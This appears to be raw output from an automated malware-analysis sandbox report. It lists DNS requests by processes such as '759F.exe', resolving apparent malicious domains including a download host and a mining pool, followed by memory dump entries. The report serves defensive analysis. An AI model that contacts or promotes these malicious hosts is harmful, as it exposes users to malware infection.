                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          venetrigni.com
                                                                                          dns
                                                                                          60 B
                                                                                          92 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          venetrigni.com

                                                                                          DNS Response

                                                                                          54.227.178.166
                                                                                          52.20.18.214

                                                                                        • 8.8.8.8:53
                                                                                          typiccor.com
                                                                                          dns
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          typiccor.com

                                                                                          DNS Response

                                                                                          54.225.64.149

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.microsoft.com
                                                                                          dns
                                                                                          126 B
                                                                                          460 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          www.microsoft.com

                                                                                          DNS Request

                                                                                          www.microsoft.com

                                                                                          DNS Response

                                                                                          80.67.94.7

                                                                                          DNS Response

                                                                                          104.85.1.163

                                                                                        • 8.8.8.8:53
                                                                                          www.bing.com
                                                                                          dns
                                                                                          58 B
                                                                                          206 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.bing.com

                                                                                          DNS Response

                                                                                          204.79.197.200
                                                                                          13.107.21.200

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          dns
                                                                                          148 B
                                                                                          260 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          13.71.61.154.dnsbl.sorbs.net

                                                                                          DNS Request

                                                                                          13.71.61.154.dnsbl.sorbs.net

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          dns
                                                                                          73 B
                                                                                          126 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          13.71.61.154.bl.spamcop.net

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          dns
                                                                                          75 B
                                                                                          139 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          13.71.61.154.zen.spamhaus.org

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          dns
                                                                                          79 B
                                                                                          143 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          13.71.61.154.sbl-xbl.spamhaus.org

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          dns
                                                                                          148 B
                                                                                          294 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          13.71.61.154.cbl.abuseat.org

                                                                                          DNS Request

                                                                                          13.71.61.154.cbl.abuseat.org

                                                                                        • 8.8.8.8:53
                                                                                          fastpool.xyz
                                                                                          dns
                                                                                          -a
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          fastpool.xyz

                                                                                          DNS Response

                                                                                          213.91.128.133

                                                                                        • 8.8.8.8:53
                                                                                          i.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          61 B
                                                                                          115 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          i.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.52

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          107 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01462599908032135.site

                                                                                          DNS Response

                                                                                          82.118.23.111

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          vexacion.com
                                                                                          dns
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          vexacion.com

                                                                                          DNS Response

                                                                                          139.45.197.236

                                                                                        • 8.8.8.8:53
                                                                                          my.rtmark.net
                                                                                          dns
                                                                                          59 B
                                                                                          75 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          my.rtmark.net

                                                                                          DNS Response

                                                                                          139.45.195.8

                                                                                        • 8.8.8.8:53
                                                                                          ssl.xdisctracking.pw
                                                                                          dns
                                                                                          66 B
                                                                                          98 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          ssl.xdisctracking.pw

                                                                                          DNS Response

                                                                                          104.21.59.88
                                                                                          172.67.220.164

                                                                                        • 8.8.8.8:53
                                                                                          www.freevpn.win
                                                                                          dns
                                                                                          61 B
                                                                                          93 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.freevpn.win

                                                                                          DNS Response

                                                                                          172.67.185.200
                                                                                          104.21.88.157

                                                                                        • 8.8.8.8:53
                                                                                          cdnjs.cloudflare.com
                                                                                          dns
                                                                                          132 B
                                                                                          196 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          cdnjs.cloudflare.com

                                                                                          DNS Response

                                                                                          104.16.18.94
                                                                                          104.16.19.94

                                                                                          DNS Request

                                                                                          cdnjs.cloudflare.com

                                                                                          DNS Response

                                                                                          104.16.18.94
                                                                                          104.16.19.94

                                                                                        • 8.8.8.8:53
                                                                                          track.xdisctracking.pw
                                                                                          dns
                                                                                          136 B
                                                                                          238 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          track.xdisctracking.pw

                                                                                          DNS Response

                                                                                          34.230.220.28

                                                                                          DNS Request

                                                                                          track.xdisctracking.pw

                                                                                          DNS Response

                                                                                          34.230.220.28

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          nusurtal4f.net
                                                                                          dns
                                                                                          60 B
                                                                                          76 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          nusurtal4f.net

                                                                                          DNS Response

                                                                                          5.61.43.76

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.facebook.com
                                                                                          dns
                                                                                          ufgaa.exe
                                                                                          62 B
                                                                                          107 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.facebook.com

                                                                                          DNS Response

                                                                                          31.13.83.36

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          vexacion.com
                                                                                          dns
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          vexacion.com

                                                                                          DNS Response

                                                                                          139.45.197.236

                                                                                        • 8.8.8.8:53
                                                                                          my.rtmark.net
                                                                                          dns
                                                                                          59 B
                                                                                          75 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          my.rtmark.net

                                                                                          DNS Response

                                                                                          139.45.195.8

                                                                                        • 8.8.8.8:53
                                                                                          visit.fractalclick.com
                                                                                          dns
                                                                                          68 B
                                                                                          116 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          visit.fractalclick.com

                                                                                          DNS Response

                                                                                          104.26.10.210
                                                                                          104.26.11.210
                                                                                          172.67.69.8

                                                                                        • 8.8.8.8:53
                                                                                          runswiftintenselythefile.vip
                                                                                          dns
                                                                                          74 B
                                                                                          90 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          runswiftintenselythefile.vip

                                                                                          DNS Response

                                                                                          3.208.146.20

                                                                                        • 8.8.8.8:53
                                                                                          webjscontent.com
                                                                                          dns
                                                                                          62 B
                                                                                          110 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          webjscontent.com

                                                                                          DNS Response

                                                                                          104.26.11.220
                                                                                          104.26.10.220
                                                                                          172.67.73.103

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          171 B
                                                                                          2
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          126 B
                                                                                          246 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.71.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          174 B
                                                                                          238 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          microsoft-com.mail.protection.outlook.com

                                                                                          DNS Request

                                                                                          microsoft-com.mail.protection.outlook.com

                                                                                          DNS Response

                                                                                          40.93.212.0
                                                                                          104.47.53.36

                                                                                          DNS Response

                                                                                          104.47.53.36
                                                                                          40.93.212.0

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          accounts.snapchat.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          67 B
                                                                                          114 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          accounts.snapchat.com

                                                                                          DNS Response

                                                                                          172.217.17.51

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.directdexchange.com
                                                                                          dns
                                                                                          69 B
                                                                                          99 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.directdexchange.com

                                                                                          DNS Response

                                                                                          35.201.70.46

                                                                                        • 8.8.8.8:53
                                                                                          dist.acnav.online
                                                                                          dns
                                                                                          63 B
                                                                                          197 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          dist.acnav.online

                                                                                          DNS Response

                                                                                          54.91.59.199
                                                                                          3.220.57.224
                                                                                          52.20.78.240
                                                                                          3.232.242.170

                                                                                        • 8.8.8.8:53
                                                                                          www.acnav.online
                                                                                          dns
                                                                                          62 B
                                                                                          194 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.acnav.online

                                                                                          DNS Response

                                                                                          54.91.59.199
                                                                                          3.220.57.224
                                                                                          52.20.78.240
                                                                                          3.232.242.170

                                                                                        • 8.8.8.8:53
                                                                                          ajax.googleapis.com
                                                                                          dns
                                                                                          65 B
                                                                                          81 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          ajax.googleapis.com

                                                                                          DNS Response

                                                                                          142.250.179.202

                                                                                        • 8.8.8.8:53
                                                                                          www.acnav.online
                                                                                          dns
                                                                                          62 B
                                                                                          194 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.acnav.online

                                                                                          DNS Response

                                                                                          54.91.59.199
                                                                                          3.220.57.224
                                                                                          52.20.78.240
                                                                                          3.232.242.170

                                                                                        • 8.8.8.8:53
                                                                                          cdnjs.cloudflare.com
                                                                                          dns
                                                                                          66 B
                                                                                          98 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          cdnjs.cloudflare.com

                                                                                          DNS Response

                                                                                          104.16.18.94
                                                                                          104.16.19.94

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          i.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          61 B
                                                                                          115 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          i.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.52

                                                                                        MITRE ATT&CK Enterprise v6

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • memory/396-174-0x0000000002FE0000-0x0000000002FE4000-memory.dmp

                                                                                          Filesize

                                                                                          16KB

                                                                                        • memory/396-175-0x0000000002FD0000-0x0000000002FD9000-memory.dmp

                                                                                          Filesize

                                                                                          36KB

                                                                                        • memory/568-218-0x0000000000400000-0x000000000046D000-memory.dmp

                                                                                          Filesize

                                                                                          436KB

                                                                                        • memory/628-117-0x0000000000540000-0x000000000054C000-memory.dmp

                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/636-138-0x0000000002110000-0x00000000021A1000-memory.dmp

                                                                                          Filesize

                                                                                          580KB

                                                                                        • memory/636-140-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                                          Filesize

                                                                                          584KB

                                                                                        • memory/768-168-0x00000000006C0000-0x00000000006C5000-memory.dmp

                                                                                          Filesize

                                                                                          20KB

                                                                                        • memory/768-169-0x00000000006B0000-0x00000000006B9000-memory.dmp

                                                                                          Filesize

                                                                                          36KB

                                                                                        • memory/816-357-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                          Filesize

                                                                                          656KB

                                                                                        • memory/816-353-0x0000000001FC0000-0x000000000205D000-memory.dmp

                                                                                          Filesize

                                                                                          628KB

                                                                                        • memory/1176-179-0x0000000000550000-0x0000000000559000-memory.dmp

                                                                                          Filesize

                                                                                          36KB

                                                                                        • memory/1176-178-0x0000000000560000-0x0000000000565000-memory.dmp

                                                                                          Filesize

                                                                                          20KB

                                                                                        • memory/1324-320-0x0000000000400000-0x0000000000417000-memory.dmp

                                                                                          Filesize

                                                                                          92KB

                                                                                        • memory/1560-163-0x0000000002D60000-0x0000000002D6B000-memory.dmp

                                                                                          Filesize

                                                                                          44KB

                                                                                        • memory/1560-162-0x0000000002D70000-0x0000000002D77000-memory.dmp

                                                                                          Filesize

                                                                                          28KB

                                                                                        • memory/1804-317-0x0000000000560000-0x00000000006AA000-memory.dmp

                                                                                          Filesize

                                                                                          1.3MB

                                                                                        • memory/1804-324-0x0000000004A04000-0x0000000004A06000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/1804-335-0x0000000004A03000-0x0000000004A04000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1804-312-0x0000000004990000-0x00000000049A9000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/1804-310-0x0000000002480000-0x000000000249B000-memory.dmp

                                                                                          Filesize

                                                                                          108KB

                                                                                        • memory/1804-333-0x0000000004A02000-0x0000000004A03000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1804-322-0x0000000000400000-0x0000000000461000-memory.dmp

                                                                                          Filesize

                                                                                          388KB

                                                                                        • memory/1804-326-0x0000000004A00000-0x0000000004A01000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1840-206-0x0000000000590000-0x00000000006DA000-memory.dmp

                                                                                          Filesize

                                                                                          1.3MB

                                                                                        • memory/1888-157-0x0000000000BB0000-0x0000000000BBC000-memory.dmp

                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/1888-156-0x0000000000BC0000-0x0000000000BC7000-memory.dmp

                                                                                          Filesize

                                                                                          28KB

                                                                                        • memory/1976-124-0x0000000004D70000-0x0000000004D71000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1976-122-0x0000000000540000-0x0000000000541000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1976-125-0x0000000004D30000-0x0000000004D31000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1976-126-0x0000000004CF0000-0x0000000004D66000-memory.dmp

                                                                                          Filesize

                                                                                          472KB

                                                                                        • memory/2080-234-0x0000000004B60000-0x0000000004B68000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/2080-237-0x00000000064A0000-0x00000000064A8000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/2080-240-0x00000000064A0000-0x00000000064A8000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/2080-233-0x0000000004820000-0x0000000004828000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/2080-246-0x0000000003470000-0x00000000034D0000-memory.dmp

                                                                                          Filesize

                                                                                          384KB

                                                                                        • memory/2080-252-0x00000000036B0000-0x0000000003710000-memory.dmp

                                                                                          Filesize

                                                                                          384KB

                                                                                        • memory/2080-238-0x0000000004980000-0x0000000004988000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/2080-211-0x0000000000400000-0x0000000000651000-memory.dmp

                                                                                          Filesize

                                                                                          2.3MB

                                                                                        • memory/2080-235-0x00000000064A0000-0x00000000064A8000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/2080-220-0x0000000003470000-0x0000000003480000-memory.dmp

                                                                                          Filesize

                                                                                          64KB

                                                                                        • memory/2080-226-0x00000000036B0000-0x00000000036C0000-memory.dmp

                                                                                          Filesize

                                                                                          64KB

                                                                                        • memory/2080-236-0x0000000004980000-0x0000000004988000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/2208-272-0x0000000002E50000-0x0000000003776000-memory.dmp

                                                                                          Filesize

                                                                                          9.1MB

                                                                                        • memory/2208-279-0x0000000000400000-0x0000000000D41000-memory.dmp

                                                                                          Filesize

                                                                                          9.3MB

                                                                                        • memory/2796-172-0x0000000000520000-0x000000000052C000-memory.dmp

                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/2796-171-0x0000000000530000-0x0000000000536000-memory.dmp

                                                                                          Filesize

                                                                                          24KB

                                                                                        • memory/2864-114-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/2980-165-0x0000000000F70000-0x0000000000F79000-memory.dmp

                                                                                          Filesize

                                                                                          36KB

                                                                                        • memory/2980-166-0x0000000000F60000-0x0000000000F6F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/2996-177-0x0000000001090000-0x00000000010A6000-memory.dmp

                                                                                          Filesize

                                                                                          88KB

                                                                                        • memory/2996-118-0x0000000000E80000-0x0000000000E97000-memory.dmp

                                                                                          Filesize

                                                                                          92KB

                                                                                        • memory/2996-207-0x0000000000ED0000-0x0000000000EE6000-memory.dmp

                                                                                          Filesize

                                                                                          88KB

                                                                                        • memory/3008-184-0x0000000002D60000-0x0000000002D69000-memory.dmp

                                                                                          Filesize

                                                                                          36KB

                                                                                        • memory/3008-183-0x0000000002D70000-0x0000000002D75000-memory.dmp

                                                                                          Filesize

                                                                                          20KB

                                                                                        • memory/3052-185-0x0000000006840000-0x0000000006841000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/3052-143-0x0000000005890000-0x0000000005891000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/3052-186-0x0000000006C60000-0x0000000006C61000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

